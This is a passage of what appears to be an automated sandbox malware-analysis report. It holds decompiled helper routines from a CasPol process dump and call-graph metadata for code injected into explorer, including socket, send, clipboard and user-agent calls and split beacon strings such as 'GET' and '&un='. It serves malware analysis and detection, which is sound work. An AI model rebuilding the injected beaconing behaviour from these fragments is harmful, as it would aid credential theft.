                                                                  				_push(__ecx);
                                                                  				_t9 = 2;
                                                                  				_t20 = 0;
                                                                  				if(E0142F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                                                  					_t20 = L01414620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                                                  				}
                                                                  				return _t20;
                                                                  			}

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 82%
                                                                  			E014841E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                  				void* _t5;
                                                                  				void* _t14;
                                                                  
                                                                  				_push(8);
                                                                  				_push(0x14d08f0);
                                                                  				_t5 = E0144D08C(__ebx, __edi, __esi);
                                                                  				if( *0x14e87ec == 0) {
                                                                  					L0140EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                  					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                                                  					if( *0x14e87ec == 0) {
                                                                  						 *0x14e87f0 = 0x14e87ec;
                                                                  						 *0x14e87ec = 0x14e87ec;
                                                                  						 *0x14e87e8 = 0x14e87e4;
                                                                  						 *0x14e87e4 = 0x14e87e4;
                                                                  					}
                                                                  					 *(_t14 - 4) = 0xfffffffe;
                                                                  					_t5 = L01484248();
                                                                  				}
                                                                  				return E0144D0D1(_t5);
                                                                  			}






                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 62516d0300ae7e8a9cac9db05ed3e147c549c9c20c0e21c0a5a280435d719578
                                                                  • Instruction ID: 0f87cb4fbb69ab9287e83e80bc15d7fd3f49690604ab60b446996356e9596b01
                                                                  • Opcode Fuzzy Hash: 62516d0300ae7e8a9cac9db05ed3e147c549c9c20c0e21c0a5a280435d719578
                                                                  • Instruction Fuzzy Hash: 5EF01EB88A0703CFDFB1EFAA9A04708B6E4F764361F10412FA0008B2BAC73454A4CF01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E014AD380(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                  				void* _t5;
                                                                  
                                                                  				if(_a4 != 0) {
                                                                  					_t5 = L013FE8B0(__ecx, _a4, 0xfff);
                                                                  					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                  					return _t5;
                                                                  				}
                                                                  				return 0xc000000d;
                                                                  			}





                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                  • Instruction ID: 3085ef76796158bdf95f79f6fe60de39b1b9325c0aff11d1ab3c66dbb74bf4f1
                                                                  • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                  • Instruction Fuzzy Hash: DBE0C231280205BBDB226E88CC00FA97B16DF70BA1F114036FE085ABB0C671AC91D7C4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0142A185() {
                                                                  				void* __ecx;
                                                                  				intOrPtr* _t5;
                                                                  
                                                                  				if( *0x14e67e4 >= 0xa) {
                                                                  					if(_t5 < 0x14e6800 || _t5 >= 0x14e6900) {
                                                                  						return L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                                                  					} else {
                                                                  						goto L1;
                                                                  					}
                                                                  				} else {
                                                                  					L1:
                                                                  					return E01410010(0x14e67e0, _t5);
                                                                  				}
                                                                  			}






                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c22ec41e066a74c6a6ce715775dcca35d1d218bc10a072054a2b8babbfac8a44
                                                                  • Instruction ID: aa98885f5bf435cc20dd7509ba8c9357de9b994b680719216d7a52827afc1947
                                                                  • Opcode Fuzzy Hash: c22ec41e066a74c6a6ce715775dcca35d1d218bc10a072054a2b8babbfac8a44
                                                                  • Instruction Fuzzy Hash: D8D02EB12A10001AC72EA7009A18B313693F7B4772F3A080FF2030BDB9EB70C8D4C208
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E014753CA(void* __ebx) {
                                                                  				intOrPtr _t7;
                                                                  				void* _t13;
                                                                  				void* _t14;
                                                                  				intOrPtr _t15;
                                                                  				void* _t16;
                                                                  
                                                                  				_t13 = __ebx;
                                                                  				if( *((char*)(_t16 - 0x65)) != 0) {
                                                                  					E0140EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                  					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                                                  					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                                                  				}
                                                                  				if(_t15 != 0) {
                                                                  					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                                                  					return  *((intOrPtr*)(_t16 - 0x64));
                                                                  				}
                                                                  				return _t7;
                                                                  			}









                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                  • Instruction ID: bb122f6d946850a4eff5d0f6b2c6adefe4b119a4b63a47a2824d9b557044760a
                                                                  • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                                                                  • Instruction Fuzzy Hash: 0DE08C319006809BDF13EB5AC650F8EBBF5FB54B00F140419A0086F770C634AC00CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E0140AAB0() {
                                                                  				intOrPtr* _t4;
                                                                  
                                                                  				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                  				if(_t4 != 0) {
                                                                  					if( *_t4 == 0) {
                                                                  						goto L1;
                                                                  					} else {
                                                                  						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                                                  					}
                                                                  				} else {
                                                                  					L1:
                                                                  					return 0x7ffe0030;
                                                                  				}
                                                                  			}





                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                  • Instruction ID: d6e3deefbfcf1d1fd3ca187a841b2d078499a9af954869a7017e1ece1e626f19
                                                                  • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                                                                  • Instruction Fuzzy Hash: 73D0E935352A80CFD757CB5DC554B1677A4BB45B44FD505A1E901CB762E63CD984CA00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E013FDB40() {
                                                                  				signed int* _t3;
                                                                  				void* _t5;
                                                                  
                                                                  				_t3 = L01414620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                                                  				if(_t3 == 0) {
                                                                  					return 0;
                                                                  				} else {
                                                                  					 *_t3 =  *_t3 | 0x00000400;
                                                                  					return _t3;
                                                                  				}
                                                                  			}






                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                  • Instruction ID: 3a476ed074a28817f7082e3f3fd628f63815f516f05f4512bcf6771d95e84c0a
                                                                  • Opcode Fuzzy Hash: 081987da54e71c0f98f8b6eb8dea8f5611fd71ec3e86a06c437935a1a17be5f8
                                                                  • Instruction Fuzzy Hash: 11C08C70280A01AAEB221F20CD01F003BA1BB20B09F4804A46300DA4F4DB7CDC01E600
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E013FAD30(intOrPtr _a4) {
                                                                  
                                                                  				return L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                  			}




                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                  • Instruction ID: 9dd91d946648cef40a1223da53a0d2f61a4c73f41073875a3491b297fa5a93a9
                                                                  • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                                  • Instruction Fuzzy Hash: BFC08C32080248BBC7126A46CD00F017B29E7A0B60F000021B6140A6718932E860D588
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E01413A1C(intOrPtr _a4) {
                                                                  				void* _t5;
                                                                  
                                                                  				return L01414620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                                                  			}





                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                  • Instruction ID: 738cf1ae08b0a19d4201d2097af3afb2658030d128e36ba7dbe12934f4d30c69
                                                                  • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                                  • Instruction Fuzzy Hash: 7FC08C32080248BBC7126E42DC00F017B2AE7A0B60F040021B6080A9708636EC60D588
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E01417D50() {
                                                                  				intOrPtr* _t3;
                                                                  
                                                                  				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                  				if(_t3 != 0) {
                                                                  					return  *_t3;
                                                                  				} else {
                                                                  					return _t3;
                                                                  				}
                                                                  			}





                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                  • Instruction ID: 2c668f102ad69573629a0bea211ddfeca18ae17bdeae3111a47976ab5b6580f8
                                                                  • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                                  • Instruction Fuzzy Hash: CEB092353019408FCE16DF18C080B1633F4BB48A40B8440D0E400CBA21D229E8008900
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 100%
                                                                  			E01422ACB() {
                                                                  				void* _t5;
                                                                  
                                                                  				return E0140EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                  			}





                                                                  Execution Graph

                                                                  Execution Coverage:3.2%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:20.2%
                                                                  Total number of Nodes:104
                                                                  Total number of Limit Nodes:9

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: recv$Sleepgetaddrinfosetsockopt
                                                                  • String ID: Co$&br=$&un=$&wn=$: cl$GET $dat=$nnec$ose$tion
                                                                  • API String ID: 878647675-2045366144
                                                                  • Opcode ID: 6d402d88823ea19e2df587a1f31de408e7f4c2e71253bbe99036a4e7cb3e0988
                                                                  • Instruction ID: fca52a9231da94bc266ad41ffa255da47829e714c132621108fa62b0c19a214a
                                                                  • Opcode Fuzzy Hash: 6d402d88823ea19e2df587a1f31de408e7f4c2e71253bbe99036a4e7cb3e0988
                                                                  • Instruction Fuzzy Hash: C8528071218A088FDB69EF28D498FEBB3E2FB98304F54462ED49BD7142DF34A5468741
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: ClipboardOpen
                                                                  • String ID:
                                                                  • API String ID: 2793039342-0
                                                                  • Opcode ID: 745962ed0e60235b729c147634a194dd063b9ef8d9cf040cceb8a21b140fd0ce
                                                                  • Instruction ID: 2ff5220c63c44cc12d7bc12c7a2fbcda0f45085a21dd7edaa2de6881422b17f7
                                                                  • Opcode Fuzzy Hash: 745962ed0e60235b729c147634a194dd063b9ef8d9cf040cceb8a21b140fd0ce
                                                                  • Instruction Fuzzy Hash: 0E111271119A098FDBA6AB2880CDBB572E1FF48305F5904B9941BCB1D2DB36C982D751
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • ObtainUserAgentString.URLMON(?,?,?,?,?,?,?,?,?,?,05AA2E9B), ref: 05AA2559
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: AgentObtainStringUser
                                                                  • String ID: -Age$User$nt: $on.d$urlm
                                                                  • API String ID: 2681117516-1987325725
                                                                  • Opcode ID: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                  • Instruction ID: f137f820a801e6cff2acb7ae2efd6c0add1dd85c39c47c03df07d49acd3b5857
                                                                  • Opcode Fuzzy Hash: 82b5596553276f9d6d4a4b9897a76d65b4f726d8346adaa5332a8f3f849bdd4c
                                                                  • Instruction Fuzzy Hash: A031B131B14A4D8BCF04EFA8D898AEEB7E1FF58205F40422AD85ED7240DF7886448785
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: closesocket
                                                                  • String ID: clos$esoc$ket
                                                                  • API String ID: 2781271927-3604069445
                                                                  • Opcode ID: 689451a6646ce39e451173c0dcf4c8f5c29d37e37dab8c7ddbdf120933efa901
                                                                  • Instruction ID: c7cbd8c8d5ced2bcb2515894d263ba07d18b8b428dbb72b32611ae09565e3fb3
                                                                  • Opcode Fuzzy Hash: 689451a6646ce39e451173c0dcf4c8f5c29d37e37dab8c7ddbdf120933efa901
                                                                  • Instruction Fuzzy Hash: 9E01F7B140CB444FDB40EF28E0C4B997BE0FB98300F14466DE59DCB246D77484468B07
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 222 5aa4112-5aa4142 223 5aa416e-5aa4181 closesocket 222->223 224 5aa4144-5aa4168 call 5aa6eb2 222->224 224->223
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: closesocket
                                                                  • String ID: clos$esoc$ket
                                                                  • API String ID: 2781271927-3604069445
                                                                  • Opcode ID: d421c9c6720000eb262619b817ed4860d3db7c06d4e9d6bd0b1ff8f44343a4ef
                                                                  • Instruction ID: f11c4f564b1bd36ad31defa1f4a0260b8f8dbb16cf8dbd89c67f27c01ff65d7f
                                                                  • Opcode Fuzzy Hash: d421c9c6720000eb262619b817ed4860d3db7c06d4e9d6bd0b1ff8f44343a4ef
                                                                  • Instruction Fuzzy Hash: 40F0F9B151CB089FDB80EF28E088B69B7E1FB98314F54567DBA4ECB245C77484468B16
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 228 5aa4082-5aa40b8 229 5aa40ba-5aa40dc call 5aa6eb2 228->229 230 5aa40e2-5aa4105 connect 228->230 229->230
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: connect
                                                                  • String ID: conn$ect
                                                                  • API String ID: 1959786783-716201944
                                                                  • Opcode ID: 8e6ee82cb52f8b496bef60ee2b46d6d5c6c48f9218987fc6b92af486adba5c92
                                                                  • Instruction ID: 24a9750f2f558a75aa01ad9492f32fdfcbe252563cc43c77c7878214dad94bfc
                                                                  • Opcode Fuzzy Hash: 8e6ee82cb52f8b496bef60ee2b46d6d5c6c48f9218987fc6b92af486adba5c92
                                                                  • Instruction Fuzzy Hash: 98012171518A088FCB94EF5CE088B547BE0FB58311F1581BEEA0DDB266C7B4C9818B85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 233 5aa3f66-5aa3f7b 234 5aa3f8d-5aa3fab 233->234 235 5aa3f7d-5aa3f8b 233->235 236 5aa3fad-5aa3fcf call 5aa6eb2 234->236 237 5aa3fd5-5aa3ff0 WSAStartup 234->237 235->234 236->237
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: Startup
                                                                  • String ID: WSAS$tart
                                                                  • API String ID: 724789610-2426239465
                                                                  • Opcode ID: 02406650e447c1fa7574cd5d84556fafe90163be47b457b1ed939eb2c599c675
                                                                  • Instruction ID: 48525d260227b9b072360fb934c5124d108a95a9fbfe17edc3ab8a7053b04585
                                                                  • Opcode Fuzzy Hash: 02406650e447c1fa7574cd5d84556fafe90163be47b457b1ed939eb2c599c675
                                                                  • Instruction Fuzzy Hash: 1301B1711196048FCB40FF28D08CBA9BBE0FF48365F2541E9E50ADF265D3B48989C756
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 240 5aa3f72-5aa3fab 242 5aa3fad-5aa3fcf call 5aa6eb2 240->242 243 5aa3fd5-5aa3ff0 WSAStartup 240->243 242->243
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: Startup
                                                                  • String ID: WSAS$tart
                                                                  • API String ID: 724789610-2426239465
                                                                  • Opcode ID: 1d4e0883fc1815f1912b8eb6048150167a70f4de8bbb156eb55e64cb1498d31e
                                                                  • Instruction ID: e8fe9b2fa69d37db7cb4b84680d1c843d86c97d568a5d03447084cc46b12ed10
                                                                  • Opcode Fuzzy Hash: 1d4e0883fc1815f1912b8eb6048150167a70f4de8bbb156eb55e64cb1498d31e
                                                                  • Instruction Fuzzy Hash: 65014471504A088FCB44EF1DD08CB69BBE0FB58351F1581E9E50DDF265C7748985C756
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 246 5a9f592-5a9f5d6 call 5a9f012 call 5aa6eb2 251 5a9f678-5a9f68c 246->251 252 5a9f5dc-5a9f5de 246->252 253 5a9f5e2-5a9f5f3 SleepEx 252->253 253->253 254 5a9f5f5-5a9f607 253->254 255 5a9f609-5a9f60f 254->255 256 5a9f63d-5a9f643 254->256 255->256 257 5a9f611-5a9f626 call 5aa0002 255->257 256->253 258 5a9f645-5a9f64b 256->258 257->256 263 5a9f628-5a9f638 call 5a9fa42 257->263 258->253 260 5a9f64d-5a9f653 258->260 260->253 262 5a9f655-5a9f666 call 5aa0e22 call 5aa64b2 260->262 268 5a9f66b-5a9f673 call 5a9f3f2 262->268 263->256 268->253
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID: K;y&
                                                                  • API String ID: 3472027048-1772047635
                                                                  • Opcode ID: fc810b80b542b816e3aa10076e14871e57494e43f3077854b27e7c2e52254b32
                                                                  • Instruction ID: 5d61a6e43a21c57502638a43a843ef985378c87009d0d1ad923ace5a5e6f9be9
                                                                  • Opcode Fuzzy Hash: fc810b80b542b816e3aa10076e14871e57494e43f3077854b27e7c2e52254b32
                                                                  • Instruction Fuzzy Hash: 71215335A08B9C8FCF59EF6890D8AA9B3E1FB94300F48066EC95FCB11ADB749441CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 271 5aa3ff2-5aa4025 272 5aa404f-5aa4077 send 271->272 273 5aa4027-5aa4049 call 5aa6eb2 271->273 273->272
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: send
                                                                  • String ID: send
                                                                  • API String ID: 2809346765-2809346765
                                                                  • Opcode ID: ad2f236766122beffabcd4b5b327f90ff22d20bd1524373b1c646cf2a1e7c532
                                                                  • Instruction ID: 972d9cb344f36262ac0002e70696d3503152c311c662a9379cc3ae45d8651509
                                                                  • Opcode Fuzzy Hash: ad2f236766122beffabcd4b5b327f90ff22d20bd1524373b1c646cf2a1e7c532
                                                                  • Instruction Fuzzy Hash: 71015270618A0C8FCB94EF5CE048B1577E0FB58310F0545AED95DCB266C7B4D8818B85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 276 5aa3ed9-5aa3f1a 277 5aa3f1c-5aa3f3e call 5aa6eb2 276->277 278 5aa3f44-5aa3f65 socket 276->278 277->278
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: socket
                                                                  • String ID: sock
                                                                  • API String ID: 98920635-2415254727
                                                                  • Opcode ID: 058ccfd56d24ceccc8dc1cea945d912323acad01842a6f445d4708d9ecda25b1
                                                                  • Instruction ID: 5d667cb7ddc925df6d572485eb9dc4084ecf0e98ada2e2a194a689d20ec0486d
                                                                  • Opcode Fuzzy Hash: 058ccfd56d24ceccc8dc1cea945d912323acad01842a6f445d4708d9ecda25b1
                                                                  • Instruction Fuzzy Hash: 600180719186188FCB44EF5CD088F50BBE0EB58311F1A85ADDA4DDB262C3B4D985CB85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 281 5aa3ee2-5aa3f1a 282 5aa3f1c-5aa3f3e call 5aa6eb2 281->282 283 5aa3f44-5aa3f65 socket 281->283 282->283
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: socket
                                                                  • String ID: sock
                                                                  • API String ID: 98920635-2415254727
                                                                  • Opcode ID: b5e9fd95fd77712679bc77e5ed075a02168c95ac9186b881f1bc913899d51f34
                                                                  • Instruction ID: 218ee38a9e3815f78021f6dcccb48595ebe6084668e5dba776af19f52ca32124
                                                                  • Opcode Fuzzy Hash: b5e9fd95fd77712679bc77e5ed075a02168c95ac9186b881f1bc913899d51f34
                                                                  • Instruction Fuzzy Hash: 0E0171719186088FCB44EF5CD088F14BBE0EB5C311F1A81BEDA0DDB266C3B4C9858B85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Control-flow Graph

                                                                  control_flow_graph 286 5aa64b2-5aa64e6 287 5aa64e9-5aa64ed 286->287 288 5aa6569-5aa6572 287->288 289 5aa64ef-5aa64f2 287->289 288->287 290 5aa6578-5aa6581 288->290 289->288 291 5aa64f4-5aa6514 call 5aa8342 289->291 292 5aa65ba-5aa65d6 290->292 293 5aa6583-5aa658a 290->293 300 5aa651f-5aa655f call 5aa74f2 291->300 301 5aa651a call 5aa8312 291->301 295 5aa659f-5aa65a8 293->295 296 5aa658c-5aa658d 293->296 295->292 299 5aa65aa-5aa65b1 295->299 298 5aa6593-5aa659d 296->298 298->295 298->298 299->292 302 5aa65b3-5aa65b4 299->302 300->288 305 5aa6561-5aa6567 SleepEx 300->305 301->300 302->292 305->288
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.522017147.0000000005A90000.00000040.80000000.00040000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_5a90000_explorer.jbxd
                                                                  Similarity
                                                                  • API ID: Sleep
                                                                  • String ID:
                                                                  • API String ID: 3472027048-0
                                                                  • Opcode ID: afa6d07527846fbb1122b3884d939f329e186663819791bdf139398d76f10f5b
                                                                  • Instruction ID: 1c7bd68d1bd1a50f823ec219c5375ec7c3e1293deb4feef8856779a8194a3e96
